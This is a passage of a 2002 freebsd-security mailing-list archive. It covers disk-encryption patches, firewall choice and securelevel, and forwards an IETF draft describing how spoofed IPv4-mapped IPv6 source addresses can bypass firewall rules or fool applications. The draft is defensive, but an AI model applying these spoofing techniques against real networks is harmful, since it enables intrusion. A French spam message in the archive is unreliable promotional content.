List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org salut c cathy Comment vas tu ? Moi je rentre de corse ou j'ai pass=E9 des vacances fabuleuses, je rentre = donc un peu d=E9prim=E9e et toi ? En ce moment je tchatche souvent sur internet, j'ai d=E9couvert le site ht= tp://www=2Esebouger=2Ecom ou je dial souvent JE te fais de gros bisous et esp=E8re te revoir sur le site Cathy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Aug 21 21:16:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E24A537B400 for ; Wed, 21 Aug 2002 21:16:41 -0700 (PDT) Received: from picton-ext.nt.tas.gov.au (picton-ext.nt.tas.gov.au [202.7.15.63]) by mx1.FreeBSD.org (Postfix) with ESMTP id 67F9043E4A for ; Wed, 21 Aug 2002 21:16:38 -0700 (PDT) (envelope-from daniel.bell@hobart.tased.edu.au) Received: from picton-ext.nt.tas.gov.au (localhost [127.0.0.1]) by picton-ext.nt.tas.gov.au (8.11.5/8.11.5) with ESMTP id g7M4GUP03001 for ; Thu, 22 Aug 2002 14:16:30 +1000 (EST) Received: from hobnts-exchange.hobart.tased.edu.au (www.hobart.tased.edu.au [147.41.41.3]) by picton-ext.nt.tas.gov.au (8.11.5/8.11.5) with ESMTP id g7M4GSf02980 for ; Thu, 22 Aug 2002 14:16:28 +1000 (EST) X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Subject: Date: Thu, 22 Aug 2002 14:16:24 +1000 Message-ID: <6F43C792364DAD499D2B415513DEC2BBFA6088@hobnts-exchange.hobart.tased.edu.au> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Index: AcJJkq1DEXO6k+xXT3qk9s/kBwebFQ== From: "Daniel Bell" To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org subscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 22 2: 5: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9849037B400 for ; Thu, 22 Aug 2002 02:05:04 -0700 (PDT) Received: from es.infosec.ru (es.infosec.ru [194.135.141.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 33E1443E75 for ; Thu, 22 Aug 2002 02:05:00 -0700 (PDT) (envelope-from blaze@infosec.ru) Received: from xen.infosec.ru ([200.0.0.51] RDNS failed) by es.infosec.ru with Microsoft SMTPSVC(5.0.2195.5329); Thu, 22 Aug 2002 13:05:10 +0400 Subject: vncrypt ported to CURRENT From: Andrey Sverdlichenko To: freebsd-security@freebsd.org Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.3 Date: 22 Aug 2002 14:05:03 +0500 Message-Id: <1030007103.50987.21.camel@xen.infosec.ru> Mime-Version: 1.0 X-OriginalArrivalTime: 22 Aug 2002 09:05:10.0884 (UTC) FILETIME=[04D90A40:01C249BB] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Now you can encrypt your vnode-based md devices. You have to recompile your kernel with device md options MD_CRYPT or do kldload md kldload mdcrypt Timeout feature not implemented, but otherwise this patch is compatible with vncrypt (both disks and keyfiles). Please report any problems. You can download patch from http://tolok.net/mdcrypt-1.0.diff.gz To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 22 3: 7: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 08F2F37B400 for ; Thu, 22 Aug 2002 03:07:03 -0700 (PDT) Received: from garuda.barc.ernet.in (garuda.barc.ernet.in [203.199.33.3]) by mx1.FreeBSD.org (Postfix) with ESMTP id 478A643E65 for ; Thu, 22 Aug 2002 03:07:01 -0700 (PDT) (envelope-from rsharma@apsara.barc.ernet.in) Received: from apsara.barc.ernet.in (apsara.barc.ernet.in [192.168.1.21]) by garuda.barc.ernet.in (Postfix) with ESMTP id 5FE965D28 for ; Thu, 22 Aug 2002 15:30:49 +0530 (IST) Received: from localhost (rsharma@localhost) by apsara.barc.ernet.in (8.9.3/8.9.3) with ESMTP id PAA21812 for ; Thu, 22 Aug 2002 15:49:16 +0530 Date: Thu, 22 Aug 2002 15:49:16 +0530 (IST) From: "R.Sharma" To: Subject: which version should i install 4.6 stable or 4.6.2 release Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi all, I want to know that what are the diferences between freeBSD x.x-Stable and FreeBSD x.x-Release. For the security point of view which version is better and please tell me if i cvsup the system, in which version i should i do it. thanks R Sharma To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 22 3:19:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EAF7337B400 for ; Thu, 22 Aug 2002 03:19:34 -0700 (PDT) Received: from munkboxen.mine.nu (213-152-51-194.dsl.eclipse.net.uk [213.152.51.194]) by mx1.FreeBSD.org (Postfix) with ESMTP id 60C0A43E3B for ; Thu, 22 Aug 2002 03:19:30 -0700 (PDT) (envelope-from munk@munkboxen.mine.nu) Received: from munkboxen.mine.nu (localhost [127.0.0.1]) by munkboxen.mine.nu (8.12.5/8.12.3) with ESMTP id g7MBHAEw082496 for ; Thu, 22 Aug 2002 11:17:11 GMT (envelope-from munk@munkboxen.mine.nu) Received: (from munk@localhost) by munkboxen.mine.nu (8.12.5/8.12.3/Submit) id g7MBH3sF082495 for freebsd-security@FreeBSD.ORG; Thu, 22 Aug 2002 11:17:03 GMT Date: Thu, 22 Aug 2002 11:17:01 +0000 From: Jez Hancock To: freebsd-security@FreeBSD.ORG Subject: Re: which version should i install 4.6 stable or 4.6.2 release Message-ID: <20020822111701.GA82469@munkboxen.mine.nu> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Aug 22, 2002 at 03:49:16PM +0530, R.Sharma wrote: > > Hi all, > I want to know that what are the diferences between freeBSD > x.x-Stable and FreeBSD x.x-Release. Start here: http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/index.html - handbook and in there you'll find: http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/current-stable.html which answers your question. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 22 10:22:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3FB4C37B400 for ; Thu, 22 Aug 2002 10:22:41 -0700 (PDT) Received: from mufasa.swistgroup.com (mufasa.swistgroup.com [196.44.35.3]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3EE5543E42 for ; Thu, 22 Aug 2002 10:22:38 -0700 (PDT) (envelope-from conrad.burger@swistgroup.com) Received: from timon ([172.16.1.30] helo=timon.swistgroup.com) by mufasa.swistgroup.com with esmtp (Exim 3.36 #1) id 17hqX1-0008Vv-00 for freebsd-security@freebsd.org; Thu, 22 Aug 2002 13:53:43 +0200 Received: from [172.16.1.3] (helo=steinmail.swistgroup.com) by timon.swistgroup.com with esmtp (Exim 3.33 #1) id 17hqX0-000DcW-00 for freebsd-security@FreeBSD.ORG; Thu, 22 Aug 2002 13:53:42 +0200 Subject: Firewalls on FreeBSD( ipfw vs ipf) MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C249D2.B404A0B2" Date: Thu, 22 Aug 2002 13:54:43 +0200 Disposition-Notification-To: "Conrad Burger" content-class: urn:content-classes:message X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Firewalls on FreeBSD( ipfw vs ipf) Thread-Index: AcJJ0o6/R5aAr9dHTICWLtOUOJvCOg== From: "Conrad Burger" To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------_=_NextPart_001_01C249D2.B404A0B2 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hi all =20 I need some help on deciding which firewall I should use to secure my intranet from the internet. =20 I cannot decide which way to go , IPF or IPFW ! =20 Which one is recommended , easiest to configure and support. =20 Can anyone please point me to some information explaining the = difference between IPFW and IPFW2. =20 A document on IPFW vs IPF would also help. =20 Thanks Conrad =20 ------_=_NextPart_001_01C249D2.B404A0B2 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable

Hi all

 

I need some help on deciding which firewall I = should use to secure my intranet from the internet.

 

I cannot decide which way to go , IPF or IPFW = !

 

Which one is recommended , easiest to = configure and support.

 

Can anyone please  point me to some = information explaining the difference between IPFW and IPFW2.

 

A document on IPFW vs IPF would also = help.

 

Thanks

Conrad   

------_=_NextPart_001_01C249D2.B404A0B2-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 22 11: 3:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4E59337B400 for ; Thu, 22 Aug 2002 11:03:22 -0700 (PDT) Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id 10E8E43E81 for ; Thu, 22 Aug 2002 11:03:21 -0700 (PDT) (envelope-from campbell@babayaga.neotext.ca) Received: from babayaga.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.12.5/8.12.5) with ESMTP id g7MI4CAx011486; Thu, 22 Aug 2002 12:04:20 -0600 (MDT) (envelope-from campbell@babayaga.neotext.ca) From: "Duncan Patton a Campbell is Dhu" To: "Conrad Burger" , Subject: Re: Firewalls on FreeBSD( ipfw vs ipf) Date: Thu, 22 Aug 2002 12:04:12 -0600 Message-Id: <20020822180412.M81055@babayaga.neotext.ca> In-Reply-To: References: X-Mailer: Open WebMail 1.70 20020712 X-OriginatingIP: 127.0.0.1 (campbell) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Check out: http://home.earthlink.net/~jaymzh666/ipf/IPFfreebsd.html#14 Duncan Patton a Campbell is Duibh ;-) ---------- Original Message ----------- From: "Conrad Burger" To: Sent: Thu, 22 Aug 2002 13:54:43 +0200 Subject: Firewalls on FreeBSD( ipfw vs ipf) > Hi all > > > > I need some help on deciding which firewall I should > use to secure my intranet from the internet. > > > > I cannot decide which way to go , IPF or IPFW ! > > > > Which one is recommended , easiest to configure and support. > > > > Can anyone please point me to some information > explaining the difference between IPFW and IPFW2. > > > > A document on IPFW vs IPF would also help. > > > > Thanks > > Conrad ------- End of Original Message ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 22 18:44:59 2002 Delivered-To: freebsd-security@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4A14C37B400; Thu, 22 Aug 2002 18:44:56 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id F1EF043E65; Thu, 22 Aug 2002 18:44:55 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7N1itJU030488; Thu, 22 Aug 2002 18:44:55 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7N1itTB030484; Thu, 22 Aug 2002 18:44:55 -0700 (PDT) Date: Thu, 22 Aug 2002 18:44:55 -0700 (PDT) From: Johan Karlsson Message-Id: <200208230144.g7N1itTB030484@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: kern/22142: securelevel does not affect mount Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: securelevel does not affect mount Responsible-Changed-From-To: freebsd-bugs->freebsd-security Responsible-Changed-By: johan Responsible-Changed-When: Thu Aug 22 18:41:46 PDT 2002 Responsible-Changed-Why: Lets get -security's opinion about this. http://www.freebsd.org/cgi/query-pr.cgi?pr=22142 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 22 19: 6:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 798A537B400 for ; Thu, 22 Aug 2002 19:06:14 -0700 (PDT) Received: from thought.holo.org (w120.z064002057.sjc-ca.dsl.cnc.net [64.2.57.120]) by mx1.FreeBSD.org (Postfix) with ESMTP id 05B3543E6E for ; Thu, 22 Aug 2002 19:06:14 -0700 (PDT) (envelope-from bwb@holo.org) Received: from localhost (localhost [127.0.0.1]) by thought.holo.org (8.12.5/8.12.5) with ESMTP id g7N26A6k087885 for ; Thu, 22 Aug 2002 19:06:10 -0700 (PDT) (envelope-from bwb@holo.org) Date: Thu, 22 Aug 2002 19:06:10 -0700 (PDT) From: Brian Buchanan To: freebsd-security@FreeBSD.ORG Subject: Re: kern/22142: securelevel does not affect mount In-Reply-To: <200208230144.g7N1itTB030484@freefall.freebsd.org> Message-ID: <20020822185704.Y87847-100000@thought.holo.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I agree with this in principle. I've already applied a similar patch to the kernel running on my firewall at home. This machine boots off compact flash media and all of its r/w filesystems are MFS, mounted noexec, nodev (with the exception of /dev, of course). With the securelevel raised, I can be reasonably certain that the compact flash's filesystem cannot be tampered with (or inadvertantly changed for any reason). The machine can be power-cycled at any time to restore it to a known state. And as a bonus, any exploits which depend on writing an executable to the filesystem cannot work. My main concern is continuing to add restrictions to the one-dimensional securelevel scheme. Though I suppose this is something which MAC will soon allow us to solve. - Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 23 0: 6:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E14BD37B400 for ; Fri, 23 Aug 2002 00:06:34 -0700 (PDT) Received: from mail.yazzy.org (mail.wrs.no [80.232.16.66]) by mx1.FreeBSD.org (Postfix) with ESMTP id E4BE943E65 for ; Fri, 23 Aug 2002 00:06:33 -0700 (PDT) (envelope-from yazzy@yazzy.org) Received: from yazzy.org (saruman.wrs [192.168.64.6]) by mail.yazzy.org (Postfix) with SMTP id 482A462FC0F4; Fri, 23 Aug 2002 08:09:59 +0200 (CEST) Received: from mail.wrs.no ([80.232.16.66]) (SquirrelMail authenticated user yazzy.yazzy.org) by www.yazzy.org with HTTP; Fri, 23 Aug 2002 08:11:33 +0200 (CEST) Message-ID: <33172.80.232.16.66.1030083093.squirrel@www.yazzy.org> Date: Fri, 23 Aug 2002 08:11:33 +0200 (CEST) Subject: Re: Firewalls on FreeBSD( ipfw vs ipf) From: "Marcin Jessa" To: Importance: Normal X-MSMail-Priority: Normal X-Priority: 3 In-Reply-To: References: Cc: Reply-To: yazzy@yazzy.org X-Mailer: h4x0r mail yazzy.org (version 1337) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Conrad. Try to do some reading on the subject. Firewalling and understanding how it works is not suppose to be something one masters in a few minutes.You can take a look at my Quick and dirty ipf and ipfw howto's in the meanwhile. http://www.ezunix.org/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=17&page=1http://www.ezunix.org/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=18&page=1 Good luck. YazzY Conrad Burger said: > Hi all > > > > I need some help on deciding which firewall I should use to secure my > intranet from the internet. > > > > I cannot decide which way to go , IPF or IPFW ! > > > > Which one is recommended , easiest to configure and support. > > > > Can anyone please point me to some information explaining the > difference between IPFW and IPFW2. > > > > A document on IPFW vs IPF would also help. > > > > Thanks > > Conrad ----------- My opinions may have changed, but not the fact that I am right. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 23 0:33:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 258B337B400 for ; Fri, 23 Aug 2002 00:33:18 -0700 (PDT) Received: from antalya.lupe-christoph.de (pD9E8862A.dip0.t-ipconnect.de [217.232.134.42]) by mx1.FreeBSD.org (Postfix) with ESMTP id 66AE943E3B for ; Fri, 23 Aug 2002 00:33:16 -0700 (PDT) (envelope-from lupe@lupe-christoph.de) Received: by antalya.lupe-christoph.de (Postfix, from userid 1000) id 223485EB; Fri, 23 Aug 2002 09:33:13 +0200 (CEST) Date: Fri, 23 Aug 2002 09:33:13 +0200 To: freebsd-security@FreeBSD.ORG Subject: FYI: [itojun@iijlab.net: IPv4 mapped address considered harmful] Message-ID: <20020823073312.GA26115@lupe-christoph.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4i From: lupe@lupe-christoph.de (Lupe Christoph) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ----- Forwarded message from Jun-ichiro itojun Hagino ----- From: Jun-ichiro itojun Hagino To: bugtraq@securityfocus.com Date: Fri, 23 Aug 2002 01:18:40 +0900 Subject: IPv4 mapped address considered harmful X-Sieve: CMU Sieve 2.2 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm X-Template-Reply-To: itojun@itojun.org X-Template-Return-Receipt-To: itojun@itojun.org X-PGP-Fingerprint: F8 24 B4 2C 8C 98 57 FD 90 5F B4 60 79 54 16 E2 X-Spam-Level: i have submitted the following draft to IETF. i'd suggest vendors who ship IPv4/v6 dual stack nodes/routers, to check if you have made a secure choice. I believe OpenBSD and NetBSD are secure enough (OpenBSD is more secure than NetBSD). itojun --- Internet Engineering Task Force Jun-ichiro itojun Hagino INTERNET-DRAFT Research Lab, IIJ Expires: Feb 22, 2003 Aug 22, 2002 IPv4 mapped address considered harmful draft-itojun-v6ops-v4mapped-harmful-00.txt Status of this Memo This document is an Internet-Draft and is in full conformance with all provisions of Section 10 of RFC2026. Internet-Drafts are working documents of the Internet Engineering Task Force (IETF), its areas, and its working groups. Note that other groups may also distribute working documents as Internet-Drafts. Internet-Drafts are draft documents valid for a maximum of six months and may be updated, replaced, or obsoleted by other documents at any time. It is inappropriate to use Internet-Drafts as reference material or to cite them other than as ``work in progress.'' To view the list Internet-Draft Shadow Directories, see http://www.ietf.org/shadow.html. Distribution of this memo is unlimited. The internet-draft will expire in 6 months. The date of expiration will be Feb 22, 2003. Abstract IPv6 address architecture [Hinden, 1998] defines IPv4 mapped address. The representation is used in IPv6 basic API [Gilligan, 1999] to denote IPv4 destinations on AF_INET6 socket within the API. At the same time, there are protocol proposals that use IPv4 mapped address on wire. Therefore, IPv4 mapped address has two meanings, and they are not distinguishable from the userland applications. This draft discusses security threats due to the dual use of IPv4 mapped address. It also discusses threats due to the additional complexities introduced by IPv4 mapped address. 1. Dual meaning of IPv4 mapped address IPv6 basic socket API [Gilligan, 1999] defines the use of IPv4 mapped address with AF_INET6 sockets. IPv4 mapped address is used as an internal identifier for IPv4 peers, on AF_INET6 sockets. The API is designed with IPv4/v6 dual stack nodes in mind. When an IPv4 packet reaches an IPv4/v6 dual stack node, kernel IPv4 layer will handle it, Hagino Expires: Feb 22, 2003 [Page 1] DRAFT IPv4 mapped address considered harmful Aug 2002 then passes it up to TCP/UDP layer. When TCP/UDP layer finds an AF_INET6 listening socket, it will pass the packet to the listening socket as if it was from the corresponding IPv4 mapped address. Let us call it "basic API behavior" in this draft. Some of the translator technologies such as SIIT [Nordmark, 2000] uses IPv4 mapped address in header fields of actual IPv6 packet on wire. These technologies are designed with IPv6 only nodes in mind. It is assumed that IPv6 packets with IPv4 mapped address will be handled by IPv6 layer then by TCP/UDP layer, and reaches an AF_INET6 socket. Let us call it "SIIT behavior" in this draft. 2. Threats due to the use of IPv4 mapped address on wire When userland application on top of AF_INET6 API sees peers with IPv4 mapped addresses (like by getpeername(2) or recvfrom(2)), it cannot detect if the packet actually was IPv4 (IPv4 mapped address appeared due to basic API behavior) or IPv6 (SIIT behavior). This ambiguity creates chances to malicious party to trick victim nodes. Here are a couple of examples: o By transmitting IPv6 packet with ::ffff:127.0.0.1 in IPv6 source address field, applications that assume basic API behavior will be tricked to believe that the packet is from the node itself (IPv4 loopback address, 127.0.0.1). o By transmitting IPv6 packet to firewall device, with IPv4 mapped address corresponds to address inside the firewall (like ::ffff:10.1.1.1) as the IPv6 source address, malicious party could bypass IPv4 filtering rules and inject traffic inside the firewall. o Assume that the victim node is an IPv4/v6 dual stack node. By transmitting IPv6 packet with IPv4 mapped address corresponds to IPv4 broadcast address (::ffff:10.255.255.255) in IPv6 source address field, to TCP/UDP port that swaps IPv6 source and destination address (e.g. UDP port 53, DNS), malicious node can trick the victim node to generate improper IPv4 broadcast traffic; This is because basic API on the victim node will emit transmission requests to destination IPv4 mapped address, ::ffff:10.255.255.255, into IPv4 traffic. 3. Other threats related to IPv4 mapped address 3.1. Access control complexity RFC2553 section 3.7 adds complexity to access controls. Due to the additional complexity, it is likely that there will be many mistakes in access controls. Hagino Expires: Feb 22, 2003 [Page 2] DRAFT IPv4 mapped address considered harmful Aug 2002 Due to RFC2553 section 3.7, AF_INET6 socket will accept IPv4 packets. On an IPv4/v6 dual stack node, if there is no AF_INET listening socket, normal administrators would believe that there will be no access from IPv4 peers. However, if AF_INET6 listening socket is present, IPv4 peers will be able to access the service. To protect applications from this threat, every access control logic has to have a special case handling for IPv4 mapped address. It is impossible to enforce such a requirement to every application implementations. 4. Suggested protocol change o In IPv4 address architecture document [Hinden, 1998] explicitly state that IPv4 mapped address is for use within basic API [Gilligan, 1999] , and basic API only. Forbid any other uses. o Move any document that suggests the use of IPv4 mapped address on wire to historic, due to security reasons. The above change will remove the threat due to the use of IPv4 mapped address on wire. Another way is to deprecate RFC2553 section 3.7, however, due to the wide deployment of applications that use IPv6 basic API, the option is not feasible. 5. Suggested implementation tips 5.1. Kernel/library developers o Do not support IPv4 mapped address on AF_INET6 API (RFC2553 section 3.7). By doing so the kernel TCP/UDP code will be greatly simplified, and will reduce the likelihood of security-sensitive kernel bugs. o Implement 2553bis [Gilligan, 2002] IPV6_V6ONLY socket option, and make the default value to on (the default value suggested by the document is "off"). This has almost the same effect as the previous bullet. With the approach you still have to implement complex in-kernel interaction between AF_INET and AF_INET6 socket, which can lead to security-senstive kernel bugs. Also, once a userland application turns the socket option off, your system will become vulnerable. The change will make your stack incompatible with 2553bis section 3.7 and 5.3. o Drop any IPv6 native packet with IPv4 mapped address in any of IPv6 header fields as well as IPv6 extension header fields. It will make the system incompatible with SIIT. Hagino Expires: Feb 22, 2003 [Page 3] DRAFT IPv4 mapped address considered harmful Aug 2002 o Drop any IPv6 DNS response that contains IPv4 mapped address. 5.2. Application developers o In EVERY userland application check the IPv6 source address, if it embeds bad IPv4 address. This approach is impossible in reality, as it's hard to know what is "bad" address, and there are millions of coders in different places. There is no way to enforce this rule. o Do not try to utilize RFC2553 section 3.7 (IPv4 traffic on AF_INET6 socket). Implement server applications by using AF_INET and AF_INET6 listening socket. Explicitly set IPV6_V6ONLY socket option to on, whenever the socket option is available on the system. NOTE: Due to the lack of standard behavior in bind(2) semantics, this may not be possible on some systems. Some IPv6 stack does not permit bind(2) to 0.0.0.0, after bind(2) to ::. Also, there is no standard on how IPv4 traffic will be routed when both 0.0.0.0 and :: listening sockets are available on the same port. 6. Security considerations The document talks about security issues in the use of IPv4 mapped address. Possible solutions are provided. 7. Change History none yet. References Hinden, 1998. R. Hinden and S. Deering, "IP Version 6 Addressing Architecture" in RFC2373 (July 1998). ftp://ftp.isi.edu/in-notes/rfc2373.txt. Gilligan, 1999. R. Gilligan, S. Thomson, J. Bound, and W. Stevens, "Basic Socket Interface Extensions for IPv6" in RFC2553 (March 1999). ftp://ftp.isi.edu/in-notes/rfc2553.txt. Nordmark, 2000. E. Nordmark, "Stateless IP/ICMP Translator (SIIT)" in RFC2765 (February, 2000). ftp://ftp.isi.edu/in-notes/rfc2765.txt. Gilligan, 2002. R. Gilligan, S. Thomson, J. Bound, J. McCann, and W. R. Stevens, "Basic Socket Interface Extensions for IPv6" in draft-ietf-ipngwg- rfc2553bis-06.txt (July 2002). work in progress material. Hagino Expires: Feb 22, 2003 [Page 4] DRAFT IPv4 mapped address considered harmful Aug 2002 Author's address Jun-ichiro itojun Hagino Research Laboratory, Internet Initiative Japan Inc. Takebashi Yasuda Bldg., 3-13 Kanda Nishiki-cho, Chiyoda-ku,Tokyo 101-0054, JAPAN Tel: +81-3-5259-6350 Fax: +81-3-5259-6351 email: itojun@iijlab.net Hagino Expires: Feb 22, 2003 [Page 5] ----- End forwarded message ----- -- | lupe@lupe-christoph.de | http://www.lupe-christoph.de/ | | Big Misunderstandings #6398: The Titanic was not supposed to be | | unsinkable. The designer had a speech impediment. He said: "I have | | thith great unthinkable conthept ..." | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 23 0:43:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8CB1A37B400; Fri, 23 Aug 2002 00:43:27 -0700 (PDT) Received: from student.uci.agh.edu.pl (student.uci.agh.edu.pl [149.156.98.60]) by mx1.FreeBSD.org (Postfix) with ESMTP id 13FA743E6A; Fri, 23 Aug 2002 00:43:27 -0700 (PDT) (envelope-from winfried@student.uci.agh.edu.pl) Received: by student.uci.agh.edu.pl (Postfix, from userid 25828) id 3F6DE64631; Fri, 23 Aug 2002 09:43:15 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by student.uci.agh.edu.pl (Postfix) with ESMTP id 386C06F609; Fri, 23 Aug 2002 09:43:15 +0200 (CEST) Date: Fri, 23 Aug 2002 09:43:15 +0200 (CEST) From: Jan Srzednicki To: Johan Karlsson Cc: freebsd-bugs@FreeBSD.org, Subject: Re: kern/22142: securelevel does not affect mount In-Reply-To: <200208230144.g7N1itTB030484@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 22 Aug 2002, Johan Karlsson wrote: > Synopsis: securelevel does not affect mount > > Responsible-Changed-From-To: freebsd-bugs->freebsd-security > Responsible-Changed-By: johan > Responsible-Changed-When: Thu Aug 22 18:41:46 PDT 2002 > Responsible-Changed-Why: > Lets get -security's opinion about this. > > http://www.freebsd.org/cgi/query-pr.cgi?pr=22142 I'm afraid changin securelevel's behaviour would break some system schemes out there, which is rather unwanted thing for -STABLE. One thing we can do is to wait for MACs in -CURRENT. Maybe a better solution is to add another sysctl 